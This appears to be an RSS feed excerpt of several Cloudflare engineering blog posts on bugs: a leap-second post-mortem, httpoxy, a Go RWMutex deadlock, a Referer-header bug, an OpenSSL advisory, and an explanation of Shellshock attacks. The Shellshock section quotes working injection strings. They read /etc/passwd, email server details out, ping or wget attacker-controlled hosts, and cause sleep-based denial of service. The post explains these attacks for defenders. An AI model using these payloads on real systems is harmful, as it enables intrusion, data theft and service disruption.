    <div>
      <h3>The one character fix</h3>
      <a href="#the-one-character-fix">
        
      </a>
    </div>
    <p>One precaution when using a non-monotonic clock source is to always check whether the difference between two timestamps is negative. Should this happen, it’s not possible to accurately determine the time difference until the clock stops rewinding.</p><p>In this patch we allowed RRDNS to forget about current upstream performance, and let it normalize again, if time skipped backwards. This prevents negative numbers from leaking into the server selection code, which would otherwise throw errors before attempting to contact the upstream server.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2j85WZisqjCJVcyemxck8s/5fdacf08b5b00ac2f764671e133b49ed/Screen-Shot-2017-01-01-at-12.22.33.png" />
            
            </figure><p>The fix we applied prevents the recording of negative values in server selection. Restarting all the RRDNS servers then fixed any recurrence of the problem.</p>
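            <p>As a minimal sketch of that precaution (illustrative names, not the actual patch), the guard is simply to check for a backwards clock step before recording the sample:</p>
            <pre><code>package main

import (
	"fmt"
	"time"
)

// safeRTT measures an elapsed time using a clock that may step
// backwards (an illustrative helper, not the actual RRDNS patch).
// If the clock went backwards mid-measurement the sample is
// meaningless, so it is reported as invalid instead of recorded.
func safeRTT(start, now time.Time) (time.Duration, bool) {
	if now.Before(start) {
		return 0, false
	}
	return now.Sub(start), true
}

func main() {
	start := time.Now()
	// Simulate the clock stepping back one second during a fast query.
	now := start.Add(-time.Second + 3*time.Millisecond)
	if rtt, ok := safeRTT(start, now); !ok {
		fmt.Println("sample dropped: clock went backwards")
	} else {
		fmt.Println("rtt:", rtt)
	}
}</code></pre>
            <p>Go later gained monotonic clock readings inside <code>time.Time</code> (Go 1.9), which makes <code>Sub</code> immune to wall-clock steps, but defensive checks like this remain useful with any non-monotonic time source.</p>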
    <div>
      <h3>Timeline</h3>
      <a href="#timeline">
        
      </a>
    </div>
    <p>The following is the complete timeline of the events around the leap second bug.</p><ul><li><p>2017-01-01 00:00 UTC Impact starts</p></li><li><p>2017-01-01 00:10 UTC Escalated to engineers</p></li><li><p>2017-01-01 00:34 UTC Issue confirmed</p></li><li><p>2017-01-01 00:55 UTC Mitigation deployed to one canary node and confirmed</p></li><li><p>2017-01-01 01:03 UTC Mitigation deployed to canary data center and confirmed</p></li><li><p>2017-01-01 01:23 UTC Fix deployed in most impacted data center</p></li><li><p>2017-01-01 01:45 UTC Fix being deployed to major data centers</p></li><li><p>2017-01-01 01:48 UTC Fix being deployed everywhere</p></li><li><p>2017-01-01 02:50 UTC Fix rolled out to most of the affected data centers</p></li><li><p>2017-01-01 06:45 UTC Impact ends</p></li></ul><p>This chart shows error rates for each Cloudflare data center (some data centers were more affected than others) and the rapid drop in errors as the fix was deployed. We deployed the fix prioritizing those locations with the most errors first.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6jwqwG3byUaTj1jux5soqZ/d7a15c7b78547a96f1c7af8b30853f69/Screen-Shot-2017-01-01-at-13.59.43-1.png" />
            
            </figure>
    <div>
      <h3>Conclusion</h3>
      <a href="#conclusion">
        
      </a>
    </div>
    <p>We are sorry that our customers were affected by this bug and are inspecting all our code to ensure that there are no other leap second sensitive uses of time intervals.</p> ]]></content:encoded>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Post Mortem]]></category>
            <category><![CDATA[RRDNS]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">2JqGGC2jqza5Af6kS3C3EA</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[CloudFlare sites protected from httpoxy]]></title>
            <link>https://blog.cloudflare.com/cloudflare-sites-protected-from-httpoxy/</link>
            <pubDate>Mon, 18 Jul 2016 15:26:00 GMT</pubDate>
            <description><![CDATA[ We have rolled out automatic protection for all customers for the newly announced vulnerability called httpoxy. ]]></description>
            <content:encoded><![CDATA[ <p><a href="https://creativecommons.org/licenses/by/2.0/">CC BY 2.0</a> <a href="https://www.flickr.com/photos/joeseggiola/2696992856/">image</a> by <a href="https://www.flickr.com/photos/joeseggiola/">Joe Seggiola</a></p><p>We have rolled out automatic protection for all customers for the newly announced vulnerability called <a href="https://httpoxy.org/">httpoxy</a>.</p><p>This vulnerability affects applications that use “classic” CGI execution models, and could lead to API token disclosure of the services that your application may talk to.</p><p>By default, httpoxy requests are modified to be harmless and then the request is allowed through; however, customers who want to outright block those requests can also use the <a href="https://www.cloudflare.com/learning/ddos/glossary/web-application-firewall-waf/">Web Application Firewall</a> rule 100050 in CloudFlare Specials to block requests that could lead to the httpoxy vulnerability.</p> ]]></content:encoded>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[API]]></category>
            <guid isPermaLink="false">7fhu3hhIvJ0ihz7IwTdtml</guid>
            <dc:creator>Ben Cartwright-Cox</dc:creator>
        </item>
        <item>
            <title><![CDATA[Creative foot-shooting with Go RWMutex]]></title>
            <link>https://blog.cloudflare.com/creative-foot-shooting-with-go-rwmutex/</link>
            <pubDate>Thu, 29 Oct 2015 21:26:36 GMT</pubDate>
            <description><![CDATA[ Hi, I'm Filippo and today I managed to surprise myself! (And not in a good way.)

I'm developing a new module ("filter" as we call them) for RRDNS, CloudFlare's Go DNS server.  ]]></description>
            <content:encoded><![CDATA[ <p>Hi, I'm Filippo and today I managed to surprise myself! (And not in a good way.)</p><p>I'm developing a new module ("filter" as we call them) for <a href="/tag/rrdns/">RRDNS</a>, CloudFlare's Go DNS server. It's a rewrite of the authoritative module, the one that adds the IP addresses to DNS answers.</p><p>It has a table of CloudFlare IPs that looks like this:</p>
            <pre><code>type IPMap struct {
	sync.RWMutex
	M map[string][]net.IP
}</code></pre>
            <p>It's a global filter attribute:</p>
            <pre><code>type V2Filter struct {
	name       string
	IPTable    *IPMap
	// [...]
}</code></pre>
            
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4YvPr9fRpSXLyFVZ4BL2lr/b11623aba2d210ffac4dcc6a11f43b32/1280px-Mexican_Standoff.jpg" />
            
            </figure><p><a href="https://www.flickr.com/photos/28293006@N05/8144747570">CC-BY-NC-ND image by Martin SoulStealer</a></p><p>The table changes often, so a background goroutine periodically reloads it from our distributed key-value store, acquires the lock (<code>f.IPTable.Lock()</code>), updates it and releases the lock (<code>f.IPTable.Unlock()</code>). This happens every 5 minutes.</p><p>Everything worked in tests, including multiple and concurrent requests.</p><p>Today we deployed to an off-production test machine and everything worked. For a few minutes. Then RRDNS stopped answering queries for the beta domains served by the new code.</p><p>What. _That worked on my laptop_™.</p><p>Here's the IPTable consumer function. You can probably spot the bug.</p>
            <pre><code>func (f *V2Filter) getCFAddr(...) (result []dns.RR) {
	f.IPTable.RLock()
	// [... append IPs from f.IPTable.M to result ...]
	return
}</code></pre>
            <p><code>f.IPTable.RUnlock()</code> is never called. Whoops. But it's an RLock, so multiple <code>getCFAddr</code> calls should work, and only table reloading should break, no? Instead <code>getCFAddr</code> started blocking after a few minutes. To the docs!</p><p><i>To ensure that the lock eventually becomes available, a blocked Lock call excludes new readers from acquiring the lock.</i> <a href="https://golang.org/pkg/sync/#RWMutex.Lock">https://golang.org/pkg/sync/#RWMutex.Lock</a></p><p>So everything worked and RLocks piled up until the table reload function ran, then the pending Lock call caused all following RLock calls to block, breaking RRDNS answer generation.</p><p>In tests the table reload function never ran while answering queries, so <code>getCFAddr</code> kept piling up RLock calls but never blocked.</p><p>No customers were affected because A) the release was still being tested on off-production machines and B) no real customers were running on the new code yet. Anyway, it was an interesting way to cause a deferred deadlock.</p><p>In closing, there's probably room for better tooling here. A static analysis tool might output a listing of all Lock/Unlock calls, and a dynamic analysis tool might report Mutexes still [r]locked at the end of tests. (Or maybe these tools already exist, in which case let me know!)</p><p><i>Do you want to help (introduce </i><code><i>:)</i></code><i> and) fix bugs in the DNS server answering more than 50 billion queries every day? </i><a href="https://www.cloudflare.com/join-our-team"><i>We are hiring in London, San Francisco and Singapore!</i></a></p> ]]></content:encoded>
            <category><![CDATA[RRDNS]]></category>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Programming]]></category>
            <category><![CDATA[Go]]></category>
            <guid isPermaLink="false">5iwarGrOuKY1ZIhN7o19u9</guid>
            <dc:creator>Filippo Valsorda</dc:creator>
        </item>
        <item>
            <title><![CDATA[Weird bug of the day: Twitter in-app browser can't visit site]]></title>
            <link>https://blog.cloudflare.com/weird-bug-of-the-day-twitter-in-app-browser-cant-visit-site/</link>
            <pubDate>Tue, 08 Sep 2015 09:55:03 GMT</pubDate>
            <description><![CDATA[ We keep a close eye on tweets that mention CloudFlare because sometimes we get early warning about odd errors that we are not seeing ourselves through our monitoring systems. Towards the end of August we saw a small number of tweets like this one: ]]></description>
            <content:encoded><![CDATA[ <p>We keep a close eye on tweets that mention CloudFlare because sometimes we get early warning about odd errors that we are not seeing ourselves through our monitoring systems.</p><p>Towards the end of August we saw a small number of tweets like this one:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3N70nN3la2z027RKH74AMt/860b153c7dae72850bd5d411839c7c07/Screen-Shot-2015-09-07-at-14-18-42.png" />
            
            </figure><p>indicating that trying to browse to a CloudFlare customer web site using the Twitter in-app browser was resulting in an error page, which was <i>very odd</i> because it was clearly only happening occasionally: <i>very</i> occasionally.</p><p>Luckily, the person who tweeted that was in the same timezone as me and able to help debug together (thanks <a href="https://twitter.com/jamesrwhite">James White</a>!); we discovered that the following sequence of events was necessary to reproduce the bug:</p><ol><li><p>Click on a link in a tweet to a web site that is using an <i>https</i> URL and open in the Twitter in-app browser (not mobile Safari). This site may or may not be a CloudFlare customer.</p></li><li><p>Then click on a link on that page to a site over an <i>http</i> URL. This site must be on CloudFlare.</p></li><li><p>BOOM</p></li></ol><p>That explained why this happened very rarely, but the question became... why did it happen at all? After some debugging it appeared to happen in recent versions of both iOS and the Twitter app (including the iOS 9 beta).</p><p>To figure out what was going on I turned to <a href="http://www.charlesproxy.com/">Charles Proxy</a> and used it to intercept the communication between my iPhone and CloudFlare. Happily, Charles Proxy can <a href="http://www.charlesproxy.com/documentation/faqs/ssl-connections-from-within-iphone-applications/">intercept SSL connections</a> by installing a custom certificate on a phone. I ran Charles Proxy on my laptop, pointed my iPhone at it (to use it as a proxy) and clicked on a tweet to a site that I had set up specially for testing.</p><p>Charles Proxy showed that the request that generated an error looked like this:</p>
            <pre><code>GET /test HTTP/1.1\r\n
Host: www.example.com\r\n
Referer: \r\n
Accept-Encoding: gzip, deflate\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Language: en-us\r\n
Connection: keep-alive\r\n
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H321 Twitter for iPhone\r\n
\r\n</code></pre>
            <p>At first glance this looked pretty normal but on a second look something really stuck out:</p>
            <pre><code>Referer: \r\n</code></pre>
            <p><a href="https://tools.ietf.org/html/rfc7231#section-5.5.2">RFC7231</a> clearly states that if the Referer header is present it must contain a URI:</p>
            <pre><code>Referer = absolute-URI / partial-URI</code></pre>
            <p>The RFC also gives a clue as to why the header is in this state when jumping from HTTPS to HTTP:</p><blockquote><p>A user agent MUST NOT send a Referer header field in an unsecured HTTP request if the referring page was received with a secure protocol.</p></blockquote>
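            <p>The subtlety here is that an absent Referer and a present-but-empty one look identical to naive code. A hypothetical validator in Go (not CloudFlare's actual Browser Integrity Check) might distinguish them like this:</p>
            <pre><code>package main

import (
	"fmt"
	"net/http"
)

// checkReferer is a hypothetical validator. Per RFC 7231 a present
// Referer must carry a URI, so an empty value is malformed; the
// lenient mode (Postel's Law) treats it like an absent header.
func checkReferer(h http.Header, strict bool) bool {
	vals, present := h["Referer"]
	if !present {
		return true // header omitted entirely: always fine
	}
	if len(vals) == 0 || vals[0] == "" {
		return !strict // empty value: reject only under strict validation
	}
	return true
}

func main() {
	h := http.Header{}
	h.Set("Referer", "") // what the Twitter in-app browser sent
	fmt.Println("strict:", checkReferer(h, true))   // false
	fmt.Println("lenient:", checkReferer(h, false)) // true
}</code></pre>
            <p>Note that <code>http.Header.Get</code> returns the empty string in both cases, so the raw header map must be consulted to tell them apart.</p>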
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6mtfnt5DXeYMJ6SXR7GOgg/33a121a054a1e600f9c9a7ba81a81020/Screen-Shot-2015-09-07-at-14-48-07.png" />
            
            </figure><p>CloudFlare's <a href="https://support.cloudflare.com/hc/en-us/articles/200170086-What-does-the-Browser-Integrity-Check-do-">Browser Integrity Check</a> was verifying that the Referer header was well formed and generating the error (since there's a Referer, but it's empty) and it looks like the Twitter app in-app browser (and, we later discovered, the Facebook app in-app browser) are, instead of removing the header, blanking it out.</p><p>This is a good example of how it's not always easy to be "strictly" RFC-compliant. <a href="https://en.wikipedia.org/wiki/Robustness_principle">Postel's Law</a> tells us that in this case CloudFlare needs to relax its check.</p><p>We reported this problem to both Twitter and Facebook and rolled out a fix that allows this behavior on the part of these clients and will turn the strict checking back on when it makes sense.</p><p>But watch your software if you validate the Referer header. You might be running into this oddness.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <guid isPermaLink="false">6ZyN6gEats7CYNZ81XSCuL</guid>
            <dc:creator>John Graham-Cumming</dc:creator>
        </item>
        <item>
            <title><![CDATA[OpenSSL Security Advisory of 19 March 2015]]></title>
            <link>https://blog.cloudflare.com/openssl-security-advisory-of-19-march-2015/</link>
            <pubDate>Thu, 19 Mar 2015 15:15:54 GMT</pubDate>
            <description><![CDATA[ Today there were multiple vulnerabilities released in OpenSSL, a cryptographic library used by CloudFlare (and most sites on the Internet). ]]></description>
            <content:encoded><![CDATA[ <p>Today there were <a href="http://openssl.org/news/secadv_20150319.txt">multiple vulnerabilities</a> released in <a href="https://www.openssl.org/">OpenSSL</a>, a cryptographic library used by CloudFlare (and most sites on the Internet). There had been advance notice that an announcement would be forthcoming, although the contents of the vulnerabilities were kept closely controlled and shared only with major operating system vendors until this notice.</p><p>Based on our analysis of the vulnerabilities and how CloudFlare uses the OpenSSL library, this batch of vulnerabilities primarily affects CloudFlare as a "Denial of Service" possibility (it can cause CloudFlare's proxy servers to crash), rather than as an information disclosure vulnerability. Customer traffic and customer SSL keys continue to be protected.</p><p>As is good security practice, we have quickly tested the patched version and begun a push to our production environment, to be completed within the hour. 
We encourage all customers to upgrade to the latest patched versions of OpenSSL on their own servers, particularly if they are using the 1.0.2 branch of the OpenSSL library.</p><p>The individual vulnerabilities included in this announcement are:</p><ul><li><p>OpenSSL 1.0.2 ClientHello sigalgs DoS (CVE-2015-0291)</p></li><li><p>Reclassified: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204)</p></li><li><p>Multiblock corrupted pointer (CVE-2015-0290)</p></li><li><p>Segmentation fault in DTLSv1_listen (CVE-2015-0207)</p></li><li><p>Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286)</p></li><li><p>Segmentation fault for invalid PSS parameters (CVE-2015-0208)</p></li><li><p>ASN.1 structure reuse memory corruption (CVE-2015-0287)</p></li><li><p>PKCS7 NULL pointer dereferences (CVE-2015-0289)</p></li><li><p>Base64 decode (CVE-2015-0292)</p></li><li><p>DoS via reachable assert in SSLv2 servers (CVE-2015-0293)</p></li><li><p>Empty CKE with client auth and DHE (CVE-2015-1787)</p></li><li><p>Handshake with unseeded PRNG (CVE-2015-0285)</p></li><li><p>Use After Free following d2i_ECPrivatekey error (CVE-2015-0209)</p></li><li><p>X509_to_X509_REQ NULL pointer deref (CVE-2015-0288)</p></li></ul><p>We thank the OpenSSL project and the individual vulnerability reporters for finding, disclosing, and remediating these problems. All software has bugs, sometimes security critical bugs, and having a good process for handling them once identified is a necessary part of the world of computer software.</p> ]]></content:encoded>
            <category><![CDATA[Bugs]]></category>
            <category><![CDATA[OpenSSL]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[SSL]]></category>
            <guid isPermaLink="false">5iDk819SWpIq72Z4POaLdw</guid>
            <dc:creator>Ryan Lackey</dc:creator>
        </item>
        <item>
            <title><![CDATA[Inside Shellshock: How hackers are using it to exploit systems]]></title>
            <link>https://blog.cloudflare.com/inside-shellshock/</link>
            <pubDate>Tue, 30 Sep 2014 22:38:02 GMT</pubDate>
            <description><![CDATA[ On Wednesday of last week, details of the Shellshock bash bug emerged. This bug started a scramble to patch computers, servers, routers, firewalls, and other computing appliances using vulnerable versions of bash. ]]></description>
            <content:encoded><![CDATA[ <p>On Wednesday of last week, details of the <a href="http://en.wikipedia.org/wiki/Shellshock_(software_bug)">Shellshock</a> bash bug emerged. This bug started a scramble to patch computers, servers, routers, firewalls, and other computing appliances using vulnerable versions of bash.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6L3sgALNPL4lzR339hqcdb/568d1050760c355a07b8bee8ed491c4f/illustration-bash-blog-1.png" />
            
            </figure><p>CloudFlare immediately rolled out <a href="/bash-vulnerability-cve-2014-6271-patched/">protection for Pro, Business, and Enterprise customers</a> through our Web Application Firewall. On Sunday, after studying the extent of the problem, and looking at logs of attacks stopped by our WAF, we decided to roll out <a href="/shellshock-protection-enabled-for-all-customers/">protection for our Free plan customers</a> as well.</p><p>Since then we've been monitoring attacks we've stopped in order to understand what they look like, and where they come from. Based on our observations, it's clear that hackers are exploiting Shellshock worldwide.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GuExiKPJg7xHj26otgdYi/818d955c560bd8831d5edd7a07fdd51d/287665619_2418591122_z.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/aussiegall/">aussiegall</a>)</p>
    <div>
      <h2>Eject</h2>
      <a href="#eject">
        
      </a>
    </div>
    <p>The Shellshock problem is an example of an <a href="http://en.wikipedia.org/wiki/Arbitrary_code_execution">arbitrary code execution (ACE)</a> vulnerability. Typically, ACE vulnerability attacks are executed on programs that are running, and require a highly sophisticated understanding of the internals of code execution, memory layout, and assembly language—in short, this type of attack requires an expert.</p><p>Attackers will also use an ACE vulnerability to upload or run a program that gives them a simple way of controlling the targeted machine. This is often achieved by running a "shell". A shell is a command-line where commands can be entered and executed.</p><p>The Shellshock vulnerability is a major problem because it removes the need for specialized knowledge, and provides a simple (unfortunately, very simple) way of taking control of another computer (such as a web server) and making it run code.</p><p>Suppose for a moment that you wanted to attack a web server and make its CD or DVD drive slide open. There's actually a command on Linux that will do that: <code>/bin/eject</code>. If a web server is vulnerable to Shellshock you could attack it by adding the magic string <code>() { :; };</code> to <code>/bin/eject</code> and then sending that string to the target computer over HTTP. Normally, the <code>User-Agent</code> string would identify the type of browser you are using, but, in the case of the Shellshock vulnerability, it can be set to say anything.</p><p>For example, if example.com was vulnerable then</p>
            <pre><code>curl -H "User-Agent: () { :; }; /bin/eject" http://example.com/</code></pre>
            <p>would be enough to actually make the CD or DVD drive eject.</p><p>In monitoring the Shellshock attacks we've blocked, we've actually seen someone attempting precisely that attack. So, if you run a web server and suddenly find an ejected DVD it might be an indication that your machine is vulnerable to Shellshock.</p>
    <div>
      <h2>Why that simple attack works</h2>
      <a href="#why-that-simple-attack-works">
        
      </a>
    </div>
    <p>When a web server receives a request for a page there are three parts of the request that can be susceptible to the Shellshock attack: the request URL, the headers that are sent along with the URL, and what are known as "arguments" (when you enter your name and address on a web site it will typically be sent as arguments in the request).</p><p>For example, here's an actual HTTP request that retrieves the CloudFlare homepage:</p>
            <pre><code>GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com</code></pre>
            <p>In this case the URL is <code>/</code> (the main page) and the headers are <code>Accept-Encoding</code>, <code>Accept-Language</code>, etc. These headers provide the web server with information about the capabilities of my web browser, my preferred language, the web site I'm looking for, and what browser I am using.</p><p>It's not uncommon for these to be turned into variables inside a web server so that the web server can examine them. (The web server might want to know what my preferred language is so it can decide how to respond to me).</p><p>For example, inside the web server responding to the request for the CloudFlare home page it's possible that the following variables are defined by copying the request headers character by character.</p>
            <pre><code>HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com</code></pre>
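<p>The conversion described above follows the standard CGI convention: take the header name, uppercase it, replace dashes with underscores, and prefix it with <code>HTTP_</code>. A minimal sketch of that mapping (the function name is ours, for illustration only):</p>

```python
def headers_to_cgi_env(headers):
    """Map HTTP request headers to CGI-style environment variables."""
    env = {}
    for name, value in headers.items():
        # CGI convention: HTTP_ prefix, uppercase, dashes become underscores
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env

env = headers_to_cgi_env({
    "Accept-Encoding": "gzip,deflate,sdch",
    "Host": "cloudflare.com",
})
print(env["HTTP_ACCEPT_ENCODING"])  # gzip,deflate,sdch
print(env["HTTP_HOST"])             # cloudflare.com
```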
            <p>As long as those variables remain inside the web server software, and aren't passed to other programs running on the web server, the server is not vulnerable.</p><p>Shellshock occurs when the variables are passed into the shell called "bash". Bash is a common shell used on Linux systems. Web servers quite often need to run other programs to respond to a request, and it's common that these variables are passed into bash or another shell.</p><p>The Shellshock problem specifically occurs when an attacker modifies the original HTTP request to contain the magic <code>() { :; };</code> string discussed above.</p><p>Suppose the attacker changes the User-Agent header above from <code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36</code> to simply <code>() { :; }; /bin/eject</code>. This creates the following variable inside the web server:</p>
            <pre><code>HTTP_USER_AGENT=() { :; }; /bin/eject</code></pre>
            <p>If that variable gets passed into bash by the web server, the Shellshock problem occurs. This is because bash has special rules for handling a variable starting with <code>() { :; };</code>. Rather than treating the variable <code>HTTP_USER_AGENT</code> as a sequence of characters with no special meaning, bash will interpret it as a command that needs to be executed (I've omitted the deeply technical explanations of why <code>() { :; };</code> makes bash behave like this for the sake of clarity in this essay.)</p><p>The problem is that <code>HTTP_USER_AGENT</code> came from the <code>User-Agent</code> header which is something an attacker controls because it comes into the web server in an HTTP request. And that's a recipe for disaster because an attacker can make a vulnerable server run any command it wants (see examples below).</p><p>The solution is to upgrade bash to a version that doesn't interpret <code>() { :; };</code> in a special way.</p>
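<p>Until the upgrade is rolled out, a web application firewall can block requests carrying the magic string. A rough sketch of such a check (the pattern is our own illustration, not CloudFlare's actual WAF rule):</p>

```python
import re

# Matches the Shellshock trigger "() {", allowing the whitespace
# variations seen in the wild, e.g. "() { :; };" and "() {:;};".
# Illustrative only; not CloudFlare's production WAF rule.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def looks_like_shellshock(header_value):
    return bool(SHELLSHOCK_RE.search(header_value))

print(looks_like_shellshock("() { :; }; /bin/eject"))                   # True
print(looks_like_shellshock("Mozilla/5.0 (Macintosh; Intel Mac OS X)")) # False
```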
    <div>
      <h2>Where attacks are coming from</h2>
      <a href="#where-attacks-are-coming-from">
        
      </a>
    </div>
    <p>When we rolled out protection for all customers we put in place a metric that allowed us to monitor the number of Shellshock attacks attempted. They all received an HTTP 403 Forbidden error code, but we kept a log of when they occurred and basic information about the attack.</p><p>This chart shows the number of attacks per second across the CloudFlare network since rolling out protection for all customers.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4lNLTw4OkPvCuli6C26Jht/94cc58bd2c0b0d0737f6daf43e56852d/Screen-Shot-2014-09-30-at-8-56-33.png" />
            
            </figure><p>From the moment CloudFlare turned on our Shellshock protection up until early this morning, we were seeing 10 to 15 attacks per second. In order of attack volume, these requests were coming from France (80%), US (7%), Netherlands (7%), and then smaller volumes from many other countries.</p><p>At about 0100 Pacific (1000 in Paris) the attacks from France ceased. We are currently seeing around 5 attacks per second. At the time of writing, we've blocked well over 1.1m Shellshock attacks.</p>
    <div>
      <h2>Let your imagination run wild</h2>
      <a href="#let-your-imagination-run-wild">
        
      </a>
    </div>
    <p>Since it's so easy to attack vulnerable machines with Shellshock, and because a vulnerable machine will run any command sent to it, attackers have let their imaginations run wild with ways to manipulate computers remotely.</p><p>CloudFlare’s WAF logs the reason it blocked a request, allowing us to extract and analyze the actual Shellshock strings being used. Shellshock is being used primarily for reconnaissance: to extract private information, and to allow attackers to gain control of servers.</p><p>Most of the Shellshock commands are being injected using the HTTP User-Agent and Referer headers, but attackers are also using GET and POST arguments and other random HTTP headers.</p><p>To extract private information, attackers are using a couple of techniques. The simplest extraction attacks are in the form:</p>
            <pre><code>() {:;}; /bin/cat /etc/passwd</code></pre>
            <p>That reads the password file <code>/etc/passwd</code>, and adds it to the response from the web server. So an attacker injecting this code through the Shellshock vulnerability would see the password file dumped out onto their screen as part of the web page returned.</p><p>In one attack they simply email private files to themselves. To get data out via email, attackers are using the <code>mail</code> command like this:</p>
            <pre><code>() { :;}; /bin/bash -c \"whoami | mail -s 'example.com l' xxxxxxxxxxxxxxxx@gmail.com</code></pre>
            <p>That command first runs <code>whoami</code> to find out the name of the user running the web server. That's especially useful because if the web server is being run as root (the superuser who can do anything) then the server will be a particularly rich target.</p><p>It then sends the user name along with the name of the web site being attacked (example.com above) via email. The name of the website appears in the email subject line.</p><p>At their leisure, the attacker can log into their email and find out which sites were vulnerable. The same email technique can be used to extract data like the password file.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/52ocewvPYryPE5fI5rAsLQ/dedad0888539c70401cb707d10e9205c/7439564750_b9ca34855c_z.jpg" />
            
            </figure><p>(CC BY 2.0 <a href="https://www.flickr.com/photos/jdhancock/">JD Hancock</a>)</p>
    <div>
      <h2>Reconnaissance</h2>
      <a href="#reconnaissance">
        
      </a>
    </div>
    <p>By far the most popular attack we've seen (around 83% of all attacks) is called “reconnaissance”. In reconnaissance attacks, the attacker sends a command that will send a message to a third-party machine. The third-party machine will then compile a list of all the vulnerable machines that have contacted it.</p><p>In the past, we've seen lists of compromised machines being turned into botnets for DDoS, spam, or other purposes.</p><p>A popular reconnaissance technique uses the <code>ping</code> command to get a vulnerable machine to send a single packet (called a ping) to a third-party server that the attacker controls. The attack string looks like this:</p>
            <pre><code>() {:;}; ping -c 1 -p cb18cb3f7bca4441a595fcc1e240deb0 attacker-machine.com</code></pre>
            <p>The <code>ping</code> command is normally used to test whether a machine is “alive” or online (an alive machine responds with its own ping). If a web server is vulnerable to Shellshock then it will send a single ping packet (the <code>-c 1</code>) to attacker-machine.com with a payload set by the <code>-p</code>. The payload is a unique ID created by the attacker so they can trace the ping back to the vulnerable web site.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2mNsjINkqc8mE1B3zc22oU/90e21a3ae6c6bc59c136afbd507d1c56/illustration-bash-blog.png" />
            
            </figure><p>Another technique being used to identify vulnerable servers is to make the web server download a web page from an attacker-controlled machine. The attacker can then look in their web server logs to find out which machine was vulnerable. This attack works by sending a Shellshock string like:</p>
            <pre><code>() {:;}; /usr/bin/wget http://attacker-controlled.com/ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA== &gt;&gt; /dev/null</code></pre>
            <p>The attacker looks in the web server log of attacker-controlled.com for entries. The page requested is set up by the attacker to reveal the name of the site being attacked: the <code>ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA==</code> is a code indicating that the attacked site was example.com.</p><p><code>ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA==</code> is a <a href="http://en.wikipedia.org/wiki/Base64">base64</a>-encoded string. When it is decoded it reads:</p>
            <pre><code>example.comShellShockSalt</code></pre>
            <p>From this string the attacker can find out if their attack on example.com was successful, and, if so, they can then go back later to further exploit that site. While I've substituted out the domain that was the target, we are seeing real examples in the wild that actually use the string <code>ShellShockSalt</code> in the encoded token.</p>
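<p>Decoding such a token takes one line; a site operator who finds one of these requests in their logs can recover the target name the same way the attacker does:</p>

```python
import base64

# The tracking token from the wget reconnaissance request above.
token = "ZXhhbXBsZS5jb21TaGVsbFNob2NrU2FsdA=="
decoded = base64.b64decode(token).decode("ascii")
print(decoded)  # example.comShellShockSalt

# Stripping the attacker's fixed suffix leaves the attacked hostname.
print(decoded.removesuffix("ShellShockSalt"))  # example.com
```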
    <div>
      <h2>Denial of Service</h2>
      <a href="#denial-of-service">
        
      </a>
    </div>
    <p>Another Shellshock attack uses this string</p>
            <pre><code>() { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20</code></pre>
            <p>It attempts to run the <code>sleep</code> command in three different ways (since systems have slightly different configurations, sleep might be found in the directories <code>/bin</code>, <code>/sbin</code> or <code>/usr/bin</code>). Whichever sleep it runs, it causes the server to wait 20 seconds before replying. That will consume resources on the machine because a thread or process executing the <code>sleep</code> will do nothing else for 20 seconds.</p><p>This is perhaps the simplest denial-of-service attack of all: the attacker simply tells the machine to sleep for a while. Send enough of those commands, and the machine could be tied up doing nothing and unable to service legitimate requests.</p>
            <figure>
            
